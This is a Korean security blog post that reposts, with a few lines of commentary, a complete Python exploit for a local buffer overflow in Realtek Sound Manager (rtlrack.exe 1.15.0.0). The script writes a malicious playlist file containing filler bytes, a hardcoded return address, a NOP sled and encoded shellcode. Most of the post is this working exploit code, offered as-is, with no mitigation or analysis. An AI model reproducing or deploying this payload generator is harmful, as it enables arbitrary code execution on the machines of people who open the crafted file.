본문 바로가기
security/해킹 보안

Realtek Sound Manager (rtlrack.exe v. 1.15.0.0) PlayList BOF Exploit

김재벌 2008. 12. 17. 13:26 
요즘 웬간한 온보드는 리얼텍 사운드 쓰는 시스템이 꽤나 많은데, BOF 코드가 발표 되었네요.

(12월 16일)

다행히도 리모트가 아니라 로컬 공격용 코드라 다행입니다.

안그래도 IE XML 취약점으로 다들 공포에 떨고 있는데, 말이죠..







#usage: exploit.py



print "--------------------------------------------------------------------------"

print " Realtek Sound Manager (rtlrack.exe v. 1.15.0.0) PlayList Buffer Overflow\n"

print " url: http://www.realtek.com.tw/\n"

print " download: ftp://152.104.238.19/pc/audio/AP_A406.exe"

print "           ftp://202.65.194.212/pc/audio/AP_A406.exe"

print "           ftp://66.104.77.130/pc/audio/AP_A406.exe\n"

print " author: shinnai"

print " mail: shinnai[at]autistici[dot]org"

print " site: http://www.shinnai.net\n"

print " Tested on: Windows XP Pro SP3 Ita\n"

print " Greetings to:"

print " str0ke for being a friend as well as a great man\n"

print " In memory of rgod"

print "--------------------------------------------------------------------------"



buff = "\x41" * 220



EIP = "\xEB\xBA\x3F\x7E" #call ESP from user32.dll



nop = "\x90" * 12



shellcode = (

    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"

    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"

    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"

    "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"

    "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"

    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"

    "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"

    "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"

    "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"

    "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"

    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"

    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"

    "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"

    "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"

    "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"

    "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"

    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"

    "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"

    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"

    "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"

    )



egg = buff + EIP + nop + shellcode + nop



try:

    out_file = open("exploit.pla",'w')

    out_file.write(egg)

    out_file.close()

    raw_input("\nFILE CREATED!\n\nPress any key to exit...")

except:

    print "Something goes wrong..."
http://solatech.tistory.com
http://cafe.naver.com/solatech
by 김재벌
저작자표시 비영리 변경금지

'security > 해킹 보안' 카테고리의 다른 글

Barracuda Spam Firewall v3.5.11.020, Model 600 SQL Injection Vulnernability  (0) 2008.12.17
TmaxSoft JEUS Alternate Data Streams Vulnerability  (0) 2008.12.17
MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit  (0) 2008.12.11
무료백신의 새로운 강자 V3lite 와 알약/pc 그린 분석 후기  (6) 2008.12.08
웹 쉘 생성기 1.0 - 중국툴  (1) 2008.11.21

'security/해킹 보안' Related Articles

티스토리툴바